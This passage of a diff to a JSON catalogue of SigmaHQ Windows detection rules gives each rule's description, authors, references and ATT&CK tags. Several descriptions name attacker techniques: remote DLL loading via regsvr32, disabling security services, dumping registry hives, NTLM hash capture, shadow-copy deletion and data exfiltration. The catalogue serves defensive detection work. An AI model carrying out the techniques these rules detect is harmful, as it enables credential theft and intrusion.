- "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20",
- "https://ss64.com/vb/cscript.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ]
- },
- "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403",
- "value": "Suspicious Registration via cscript.exe"
- },
- {
- "description": "Detects various anomalies in relation to regsvr32.exe",
- "meta": {
- "author": "Florian Roth, oscd.community, Tim Shelton",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_regsvr32_anomalies.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html",
- "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010",
- "car.2019-04-002",
- "car.2019-04-003"
- ]
- },
- "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d",
- "value": "Regsvr32 Anomaly"
- },
- {
- "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/07/13",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/sbousseaden/status/1282441816986484737?s=12",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0",
- "value": "Regsvr32 Flags Anomaly"
- },
- {
- "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/01/11",
- "falsepositive": [
- "FQDNs that start with a number"
- ],
- "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/mrd0x/status/1461041276514623491c19-ps",
- "https://twitter.com/tccontre18/status/1480950986650832903",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8",
- "value": "Suspicious Regsvr32 HTTP IP Pattern"
- },
- {
- "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/11/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_regsvr32_image.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://guides.lib.umich.edu/c.php?g=282942&p=1885348",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e",
- "value": "Suspicious Regsvr32 Execution With Image Extension"
- },
- {
- "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/07/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_regsvr32_no_dll.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574",
- "attack.execution"
- ]
- },
- "uuid": "50919691-7302-437f-8e10-1fe088afa145",
- "value": "Regsvr32 Command Line Without DLL"
- },
- {
- "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/10/31",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_regsvr32_remote_share.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5",
- "value": "Suspicious Regsvr32 Execution From Remote Share"
- },
- {
- "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.",
- "meta": {
- "author": "elhoim",
- "creation_date": "2022/05/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/intelligence-insights-april-2022/",
- "https://www.echotrail.io/insights/search/regsvr32.exe",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca",
- "value": "Regsvr32 Spawning Explorer"
- },
- {
- "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys",
- "meta": {
- "author": "frack113, Nasreddine Bencherchali",
- "creation_date": "2022/08/19",
- "falsepositive": [
- "Rare legitimate add to registry via cli (to these locations)"
- ],
- "filename": "proc_creation_win_susp_reg_add.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md",
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md",
- "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112",
- "attack.t1562.001"
- ]
- },
- "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829",
- "value": "Reg Add Suspicious Paths"
- },
- {
- "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/11/15",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_susp_reg_bitlocker.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml"
+ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml"
 ],
 "tags": [
 "attack.impact",
- "attack.t1486"
+ "attack.t1490"
 ]
 },
- "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5",
- "value": "Suspicious Reg Add BitLocker"
+ "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40",
+ "value": "Deletion of Volume Shadow Copies via WMI with PowerShell"
 },
 {
- "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service",
+ "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.",
 "meta": {
- "author": "Florian Roth, John Lambert (idea), elhoim",
- "creation_date": "2021/07/14",
+ "author": "Julia Fomina, oscd.community",
+ "creation_date": "2020/10/09",
 "falsepositive": [
- "Unknown",
- "Other security solution installers"
+ "Unlikely"
 ],
- "filename": "proc_creation_win_susp_reg_disable_sec_services.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/JohnLaTwC/status/1415295021041979392",
- "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
- "https://vms.drweb.fr/virus/?i=24144899",
- "https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "5e95028c-5229-4214-afae-d653d573d0ec",
- "value": "Reg Disable Security Service"
- },
- {
- "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/12/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_reg_open_command.yml",
+ "filename": "proc_creation_win_susp_rpcping.yml",
 "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml"
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
+ "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/",
+ "https://twitter.com/vysecurity/status/974806438316072960",
+ "https://twitter.com/vysecurity/status/873181705024266241",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml"
 ],
 "tags": [
 "attack.credential_access",
 "attack.t1003"
 ]
 },
- "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563",
- "value": "Suspicious Reg Add Open Command"
- },
- {
- "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/08/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_renamed_adfind.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.joeware.net/freetools/tools/adfind/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
- "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1018",
- "attack.t1087.002",
- "attack.t1482",
- "attack.t1069.002"
- ]
- },
- "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b",
- "value": "Renamed AdFind Detection"
+ "uuid": "93671f99-04eb-4ab4-a161-70d446a84003",
+ "value": "Capture Credentials with Rpcping.exe"
 },
 {
 "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory",
@@ -52950,338 +42698,454 @@
 "value": "Renamed CreateDump Process Dump"
 },
 {
- "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2020/01/28",
- "falsepositive": [
- "Unknown yet"
- ],
- "filename": "proc_creation_win_susp_renamed_dctask64.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/gN3mes1s/status/1222088214581825540",
- "https://twitter.com/gN3mes1s/status/1222095963789111296",
- "https://twitter.com/gN3mes1s/status/1222095371175911424",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036",
- "attack.t1055.001",
- "attack.t1202",
- "attack.t1218"
- ]
- },
- "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b",
- "value": "Renamed ZOHO Dctask64"
- },
- {
- "description": "Detects suspicious renamed SysInternals DebugView execution",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2020/05/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_renamed_debugview.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.epicturla.com/blog/sysinturla",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1588.002"
- ]
- },
- "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f",
- "value": "Renamed SysInternals Debug View"
- },
- {
- "description": "Detects execution of renamed version of PAExec. Often used by attackers",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/05/22",
- "falsepositive": [
- "Weird admins that rename their tools",
- "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing",
- "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\""
- ],
- "filename": "proc_creation_win_susp_renamed_paexec.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.poweradmin.com/paexec/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1202"
- ]
- },
- "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9",
- "value": "Renamed PAExec"
- },
- {
- "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.",
- "meta": {
- "author": "Julia Fomina, oscd.community",
- "creation_date": "2020/10/09",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_susp_rpcping.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/",
- "https://twitter.com/vysecurity/status/974806438316072960",
- "https://twitter.com/vysecurity/status/873181705024266241",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003"
- ]
- },
- "uuid": "93671f99-04eb-4ab4-a161-70d446a84003",
- "value": "Capture Credentials with Rpcping.exe"
- },
- {
- "description": "Detects suspicious process related to rundll32 based on arguments",
- "meta": {
- "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment"
- ],
- "filename": "proc_creation_win_susp_rundll32_activity.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/",
- "https://twitter.com/Hexacorn/status/885258886428725250",
- "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
- "https://twitter.com/nas_bench/status/1433344116071583746",
- "https://twitter.com/eral4m/status/1479106975967240209",
- "https://twitter.com/eral4m/status/1479080793003671557",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9",
- "value": "Suspicious Rundll32 Activity"
- },
- {
- "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/10/22",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment",
- "Windows control panel elements have been identified as source (mmc)"
- ],
- "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
- "https://github.com/Neo23x0/DLLRunner",
- "https://twitter.com/cyb3rops/status/1186631731543236608",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c",
- "value": "Suspicious Call by Ordinal"
- },
- {
- "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/03/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055"
- ]
- },
- "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd",
- "value": "Suspicious Rundll32 Invoking Inline VBScript"
- },
- {
- "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/01/14",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3",
- "value": "Rundll32 JS RunHTMLApplication Pattern"
- },
- {
- "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/04/21",
- "falsepositive": [
- "Administrative activity"
- ],
- "filename": "proc_creation_win_susp_rundll32_keymgr.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/NinjaParanoid/status/1516442028963659777",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1555.004"
- ]
- },
- "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c",
- "value": "Suspicious Key Manager Access"
- },
- {
- "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/05/27",
- "falsepositive": [
- "Possible but rare"
- ],
- "filename": "proc_creation_win_susp_rundll32_no_params.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.cobaltstrike.com/help-opsec",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1202"
- ]
- },
- "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a",
- "value": "Suspicious Rundll32 Without Any CommandLine Params"
- },
- {
- "description": "Detects suspicious process related to rundll32 based on arguments",
+ "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs",
 "meta": {
 "author": "frack113",
- "creation_date": "2021/12/04",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment"
- ],
- "filename": "proc_creation_win_susp_rundll32_script_run.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7",
- "value": "Suspicious Rundll32 Script in CommandLine"
- },
- {
- "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.",
- "meta": {
- "author": "Konstantin Grishchenko, oscd.community",
- "creation_date": "2020/10/07",
- "falsepositive": [
- "Scripts and administrative tools that use INF files for driver installation with setupapi.dll"
- ],
- "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
- "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
- "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
- "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "285b85b1-a555-4095-8652-a8a4106af63f",
- "value": "Suspicious Rundll32 Setupapi.dll Activity"
- },
- {
- "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way",
- "meta": {
- "author": "elhoim, CD_ROM_",
- "creation_date": "2022/04/27",
+ "creation_date": "2021/07/16",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml",
+ "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218",
+ "attack.t1216"
+ ]
+ },
+ "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1",
+ "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code"
+ },
+ {
+ "description": "Detects usage of the Chisel tunneling tool via the commandline arguments",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/09/13",
+ "falsepositive": [
+ "Some false positives may occure with other tools with similar commandlines"
+ ],
+ "filename": "proc_creation_win_chisel_usage.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml"
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
+ "https://github.com/jpillora/chisel/",
+ "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1090.001"
+ ]
+ },
+ "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5",
+ "value": "Chisel Tunneling Tool Usage"
+ },
+ {
+ "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/07/24",
+ "falsepositive": [
+ "Legitimate use of the impacket tools"
+ ],
+ "filename": "proc_creation_win_impacket_compiled_tools.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1557.001"
+ ]
+ },
+ "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19",
+ "value": "Impacket Tool Execution"
+ },
+ {
+ "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/30",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_reg_service_imagepath_change.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1574.011"
+ ]
+ },
+ "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db",
+ "value": "Service ImagePath Change with Reg.exe"
+ },
+ {
+ "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n",
+ "meta": {
+ "author": "Konstantin Grishchenko, oscd.community",
+ "creation_date": "2020/10/06",
+ "falsepositive": [
+ "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process"
+ ],
+ "filename": "proc_creation_win_susp_vboxdrvinst.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
+ "https://twitter.com/pabraeken/status/993497996179492864",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.t1218.011"
+ "attack.t1112"
 ]
 },
- "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b",
- "value": "RunDLL32 Spawning Explorer"
+ "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262",
+ "value": "Suspicious VBoxDrvInst.exe Parameters"
+ },
+ {
+ "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/11/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"
+ ],
+ "tags": [
